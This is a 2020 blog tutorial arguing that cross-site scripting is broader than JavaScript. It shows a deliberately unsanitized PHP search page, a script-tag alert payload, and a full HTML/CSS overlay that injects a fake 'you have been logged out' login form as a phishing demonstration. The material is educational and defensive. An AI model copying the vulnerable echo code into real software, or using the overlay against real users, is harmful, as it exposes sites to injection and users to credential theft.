Wednesday, 9 December 2020

Cross-site Scripting Without JavaScript

It has been said that in order to guard against Cross-site Scripting (XSS), a developer needs to be wary of JavaScript being executed in content displayed on the website. That's certainly true, but inadequate. XSS is not only about malicious JavaScript being executed in a website via HTML injection. There are plenty of avenues to attack via HTML injection without the use of JavaScript.

To illustrate what I'm saying, here's a sample search page in PHP with a bit of Lorem Ipsum. It has not been protected against XSS.
<!DOCTYPE html>
<html>
    <head>
        <title>XSS test</title>
    </head>
    <body>
        <?php
        if (isset($_POST["search"]))
        {
            echo "You searched for: " . $_REQUEST["search"];
        }
        ?>
        <form method="POST">
            Search:
            <input name="search" placeholder="Enter search terms here...">
            <input type="submit" value="Search">
        </form>

        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam a justo metus. Integer semper eros ligula, ut porta neque feugiat et. Aenean at sem iaculis, tempus libero non, blandit augue. Phasellus eu dolor ac lacus congue rhoncus. Aliquam tempor, dolor vel porta fermentum, arcu tellus vestibulum turpis, sed condimentum enim lectus ut ligula. Maecenas id consectetur enim, a rutrum risus. Donec tempor ornare viverra. Ut bibendum nunc ac ligula rhoncus, quis rhoncus augue tempus. Mauris vulputate tempor diam, vitae mattis ligula lacinia sit amet.</p>

        <p>Praesent ac turpis pretium, pretium augue ullamcorper, consequat diam. Vestibulum vehicula scelerisque luctus. Nulla eget sollicitudin urna, in consectetur sem. Vestibulum vel tortor libero. Nunc maximus leo non urna cursus, vitae suscipit est gravida. Aliquam ac vulputate ligula. Sed et congue ligula. Phasellus nec imperdiet augue, in aliquam arcu. Sed mollis eleifend leo et tincidunt. Curabitur scelerisque dolor id mi commodo volutpat. Nam quis lacinia neque, at imperdiet augue.</p>

        <p>In odio ex, gravida in dolor quis, commodo tempus dui. Donec egestas felis sit amet tortor pretium convallis. Aliquam ultrices, nulla eget pellentesque hendrerit, lectus arcu varius orci, finibus congue sapien magna id dolor. Vestibulum neque dolor, cursus sit amet nulla in, feugiat sagittis risus. Cras facilisis bibendum pulvinar. Integer finibus aliquam ipsum, in commodo lorem placerat non. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec et magna at dolor scelerisque consequat pharetra a nisi. Morbi viverra sapien lorem, eget venenatis diam auctor ultrices. Duis congue felis mattis egestas mollis. Duis aliquam turpis nisi, sit amet rutrum nibh sodales eget.</p>

        <p>Vestibulum eget dolor urna. Pellentesque nisi risus, tincidunt pretium ultricies eget, semper sed est. Mauris egestas, metus sit amet porta fringilla, ipsum magna rhoncus arcu, at iaculis lacus ligula quis turpis. Morbi vitae efficitur nulla. Pellentesque elementum, justo quis dignissim dapibus, eros est faucibus erat, sollicitudin lacinia felis justo nec lacus. Morbi vitae lobortis enim. Phasellus metus nibh, fermentum non lacinia non, tempus sit amet ipsum. Aenean sollicitudin egestas lobortis. Integer dictum ultricies dui a facilisis. Praesent augue augue, porta vel eros et, congue porttitor ipsum. Phasellus hendrerit felis purus, vitae facilisis enim auctor eu. Integer laoreet dapibus sodales. </p>

        <p>Vestibulum pellentesque hendrerit convallis. Curabitur tempor at odio quis tristique. Phasellus accumsan quam et sem pellentesque tempus. Donec non arcu sed risus vehicula efficitur eu at est. Ut vestibulum et nisi sed malesuada. Nunc mattis egestas nulla, nec malesuada sapien tempor a. Aenean ullamcorper nulla id lacus varius pulvinar. Ut vitae nisl fermentum, sagittis magna sed, ultricies enim. Nunc et ante id felis varius ultrices. Ut sit amet diam dapibus, bibendum risus sed, posuere urna. Maecenas eleifend ante non imperdiet efficitur. Sed vel nisl quis lorem commodo varius ut faucibus quam. Suspendisse placerat accumsan quam, in malesuada tellus. Integer quam augue, feugiat vel neque eget, pretium ultrices mi. Vestibulum a sollicitudin est. </p>
    </body>
</html>


When you run this, it takes the string entered and displays it - a big XSS no-no.






XSS with JavaScript

Running with the example above, let's try using a script tag in the input.

<script>alert('xss attack!')</script>


Right now, it's a simple alert() function being run; but what happens if it actually does something terrible?





XSS without JavaScript

You might be thinking - let's just disable JavaScript; problem solved! In this day and age, disabling JavaScript has the undesirable effect of crippling the user interface to the point where usability is greatly diminished. In business terms, this is impractical and utterly unacceptable.

And, as mentioned, strange as it may sound, you can still carry out XSS without JavaScript.

Try entering this string. Note that there are no script tags in it - only a form tag.
<div style="font-family:verdana;width:100%;height:100%;position:fixed;left:0;top:0;right:0,bottom:0;background-color:rgba(0,0,0,0.8);"><br /><br /><br /><br /><div style="width:600px;height:auto;background-color:rgba(255,255,255,1);border-radius:20px;padding:20px;margin:0 auto 0 auto"><h3 style="color:red;text-align:center">Warning</h3><h4>You have been logged out of the system for security reasons. Someone may be attempting to steal your password. To regain control over your credentials, please log in again. </h4><form method="POST" action="http://www.teochewthunder.com"><table width="100%"><tr><td><label>ID:</label></td><td><input type="text"></td></tr><tr><td><label>Pasword:</label></td><td><input type="password"></td></tr><tr><td></td><td><button type="submit" style="width:100px;height:30px;color:white;font-weight:bold;background-color:rgba(50,50,255,1);border-radius:50px">Login</button></td></tr><tr><td></td><td></td><td><small><i>Symphonetic Security Systems &copy; 2020</i></small></td></tr></table></form></div></div>


And woosh! Now when the page is run, it pops up an overlay with an official-looking form asking the user to log in with his or her username and password. It's a combination of Social Engineering and Phishing. Again, no JavaScript was run here - it was all purely HTML and CSS.





If you submit the form, right now, all it does is go to www.teochewthunder.com. But what if it redirected the user to somewhere way more sinister, where the username and password were now stored for nefarious purposes?

In conclusion...

XSS is not about JavaScript.

It's not just JavaScript that a developer has to look out for. In the example given, it wasn't just that the input was not sanitized against malicious JavaScript - it wasn't sanitized against HTML tags, period. The input text length was not restricted.

It's time to stop thinking of XSS as a JavaScript attack, and more as HTML injection.

<script>alert("I hope this has been useful!");</script>
T___T

No comments:

Post a Comment